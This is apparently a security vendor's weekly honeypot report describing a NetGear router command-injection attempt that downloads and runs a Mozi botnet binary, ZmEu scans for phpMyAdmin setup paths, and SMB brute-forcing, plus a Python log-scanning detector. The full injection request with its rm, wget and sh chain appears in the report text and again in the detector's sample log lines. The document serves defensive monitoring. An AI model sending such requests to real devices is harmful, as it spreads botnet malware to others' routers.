
Honeypots: activity of the week 51

This week, TEHTRIS reports on 3 malicious activities observed on its international honeypot network.

IP addresses hosted in China and unknown to public blacklists targeting NetGear routers

The default gateway IP address of a NetGear router is 192.168.1[.]1.

This week, 22 unique IP addresses performed the following URL request on more than half of our European honeypots:

/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192.168.1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1

The cybercriminal's goal is to make the router fetch files from the NetGear router's default IP address, 192.168.1[.]1.

The request also contains the file name ‘Mozi.m’, which corresponds to the Mozi botnet. In 2019, researchers at Netlab found that this botnet spreads through vulnerabilities, especially in IoT devices. Mozi is generally used to perform DDoS attacks, to execute a payload from a specified URL, or to execute system or custom commands.

Attempts to exploit NetGear routers have been observed since 2018 on DGN1000 models, for which the vulnerability allowing remote code execution was discovered in 2017. These attack attempts have kept evolving ever since.

IoCs:


Of these 22 unique IP addresses, 12, which is more than half, are unknown to public databases of malicious IPs. The others remain little known. Moreover, 21 are hosted by ASes located in China.

TEHTRIS recommends patching routers and always updating to new versions as soon as they are available.

ZmEu: a crawler bot looking for vulnerabilities in phpMyAdmin

This week, ZmEu made a notable entrance into the top 10 of monitored user agents with nearly 500 hits. ZmEu is a crawler bot and vulnerability scanner that searches for web servers exposed to attack through phpMyAdmin (vulnerable versions of the MySQL administration software). It also attempts to guess SSH passwords by brute force and leaves a persistent backdoor. This crawler bot is believed to have been developed in Romania and has been rampant since 2012.

URL requests monitored on our honeypots:

/w00tw00t.at.blackhats.romanian.anti-sec:)
/pma/scripts/setup.php
/phpmyadmin/scripts/setup.php
/phpMyAdmin/scripts/setup.php
/myadmin/scripts/setup.php
/MyAdmin/scripts/setup.php

The ZmEu tool performs automated scans by probing well-known paths to site configuration scripts.

These URL requests were performed by 6 unique IP addresses, all identified as malicious in public blacklists, against all our European honeypots.

IoCs:


To secure web servers against this threat, TEHTRIS recommends using and updating to the latest version of phpMyAdmin.
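As an added example that is not part of the original TEHTRIS report, the following Python script flags both request patterns described in the two sections above in web-server access logs: the NetGear setup.cgi syscmd injection carrying the Mozi stager, and ZmEu's marker request and phpMyAdmin setup paths. The log lines and source IPs are constructed; the request strings match those quoted above.

```python
import re
from urllib.parse import urlsplit, unquote_plus
# Constructed sample access-log lines (combined log format) modelled on the two
# request patterns above; the source IPs are documentation-range placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [20/Dec/2021:10:01:02 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.1" 404 162 "-" "Mozilla/5.0"
192.0.2.11 - - [20/Dec/2021:10:02:14 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 162 "-" "ZmEu"
192.0.2.11 - - [20/Dec/2021:10:02:15 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 162 "-" "ZmEu"
192.0.2.12 - - [20/Dec/2021:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# ZmEu's marker request and the phpMyAdmin setup paths listed above
ZMEU_MARKER = "/w00tw00t.at.blackhats.romanian.anti-sec:)"
ZMEU_PATHS = {"/pma/scripts/setup.php", "/phpmyadmin/scripts/setup.php",
              "/myadmin/scripts/setup.php"}  # compared case-insensitively

def parse_query(query):
    """Split on '&' only; stdlib parse_qs also splits on ';' in older Pythons."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params

def classify(url, user_agent):
    """Return detection tags for one request (empty list when nothing matches)."""
    tags = []
    parts = urlsplit(url)
    if parts.path == "/setup.cgi":
        qs = parse_query(parts.query)
        cmd = qs.get("cmd", [""])[0]
        # todo=syscmd with a non-empty cmd is the injection shape itself
        if qs.get("todo") == ["syscmd"] and cmd:
            tags.append("netgear-setup.cgi-syscmd")
            if "Mozi" in cmd:
                tags.append("mozi-stager")
    if (parts.path == ZMEU_MARKER or parts.path.lower() in ZMEU_PATHS
            or user_agent == "ZmEu"):
        tags.append("zmeu-scan")
    return tags

def scan_log(text):
    """Return {source_ip: sorted detection tags} over a whole access log."""
    hits = {}
    for line in text.splitlines():
        if (m := LOG_RE.match(line)) and (tags := classify(m["url"], m["ua"])):
            hits.setdefault(m["ip"], set()).update(tags)
    return {ip: sorted(t) for ip, t in hits.items()}
```

Feeding a real access log into scan_log gives a per-source summary; the setup.cgi rule keys on the todo=syscmd shape rather than the Mozi file name, so it also catches variants that stage a different payload.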

Persistent brute-force attacks on the SMB protocol from IP addresses unknown to public blacklists of malicious IPs

This week, 8 of the top 10 IP addresses performing brute-force attempts on the SMB protocol against our honeypots are unknown to public blacklist databases of IPs carrying out malicious activities. 4 of them are hosted in South America, as already observed in week 48.

IoCs:
